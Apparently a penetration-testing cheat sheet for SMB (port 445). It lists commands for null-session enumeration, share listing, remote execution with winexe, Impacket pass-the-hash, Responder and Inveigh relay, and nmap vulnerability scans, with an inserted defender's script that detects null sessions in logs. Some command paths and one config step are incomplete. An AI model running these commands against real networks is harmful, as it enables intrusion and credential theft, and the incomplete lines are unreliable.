445 - SMB

Check for null sessions

crackmapexec smb <ip> -u '' -p ''
enum4linux <ip>
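
Defender's view of the null-session check above, as an added example that is not part of the original cheat sheet: a successful null session is recorded on the target as Security event 4624, logon type 3, for ANONYMOUS LOGON (SID S-1-5-7). The JSON-lines export shape, host names and addresses below are constructed assumptions.

```python
import json
from collections import defaultdict

ANONYMOUS_SID = "S-1-5-7"  # well-known SID of ANONYMOUS LOGON
LOCAL = {"", "-", "::1", "127.0.0.1"}  # sources that are not a remote client

# Constructed sample: Security-log records flattened to JSON lines (assumed export shape).
SAMPLE_EVENTS = """\
{"EventID": 4624, "Computer": "FS01", "LogonType": 3, "TargetUserSid": "S-1-5-7", "IpAddress": "10.0.0.50"}
{"EventID": 4624, "Computer": "DC01", "LogonType": 3, "TargetUserSid": "S-1-5-7", "IpAddress": "10.0.0.50"}
{"EventID": "4624", "Computer": "WEB01", "LogonType": "3", "TargetUserSid": "S-1-5-7", "IpAddress": "10.0.0.50"}
{"EventID": 4624, "Computer": "DC01", "LogonType": 3, "TargetUserSid": "S-1-5-7", "IpAddress": "10.0.0.7"}
{"EventID": 4624, "Computer": "FS01", "LogonType": 3, "TargetUserSid": "S-1-5-21-1-2-3-1104", "IpAddress": "10.0.0.9"}
{"EventID": 4624, "Computer": "DC01", "LogonType": 3, "TargetUserSid": "S-1-5-7", "IpAddress": "-"}
{"EventID": 4624, "Computer": "FS01", "Logon
"""

def is_null_session(event):
    """True for a successful network logon (4624, type 3) by the anonymous principal."""
    return (
        isinstance(event, dict)
        and str(event.get("EventID")) == "4624"
        and str(event.get("LogonType")) == "3"
        and event.get("TargetUserSid") == ANONYMOUS_SID
    )

def null_session_sources(lines, min_hosts=2):
    """Return {source IP: sorted hosts} for sources with null sessions on >= min_hosts hosts.

    Single anonymous logons also occur in normal operation, so the threshold
    keeps the focus on one source sweeping several machines.
    """
    seen = defaultdict(set)
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or damaged records instead of aborting the hunt
        if is_null_session(event):
            ip = event.get("IpAddress") or "-"
            if ip not in LOCAL:
                seen[ip].add(event.get("Computer", "?"))
    return {ip: sorted(hosts) for ip, hosts in seen.items() if len(hosts) >= min_hosts}

if __name__ == "__main__":
    for ip, hosts in null_session_sources(SAMPLE_EVENTS.splitlines()).items():
        print(f"{ip}: anonymous network logons on {', '.join(hosts)}")
```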

Connecting to SMB Shares

List SMB shares

smbclient -L [IP]

Connect to SMB share

smbclient \\\\[ip]\\[share name]
rpcclient -U "" -N [ip]
enum4linux -a <ip>
/usr/bin/winexe -U mad01/user123%abcABC1234 //<ip> ipconfig

Using psexec from Impacket

/usr/share/doc/python3-impacket/examples/ -hashes aad3b435b51404eeaad3b435b51404ee:a40cad43aedd6bdddddddddf45 <user>@<ip>

Relay

For SMB relay to be possible, you must turn off SMB and HTTP in the Responder config file (you can change it back when you have finished).
Set responder.conf to:
Then run responder:
sudo python3.9 /usr/share/responder/ -I eth0 -w -F -v
Then run the following in another terminal session:
sudo python3.9 /usr/share/responder/tools/ -t <target_IP> -u ALL

Inveigh Relay

Session attack requires SMB tools from Invoke-TheHash
Invoke-InveighRelay -ConsoleOutput Y -Target <ip> -Command "...."

Create an SMB Share

sudo impacket-smbserver share . -smb2support

Scan for common vulns

nmap --script "smb-vuln*" -p 139,445 <ip>
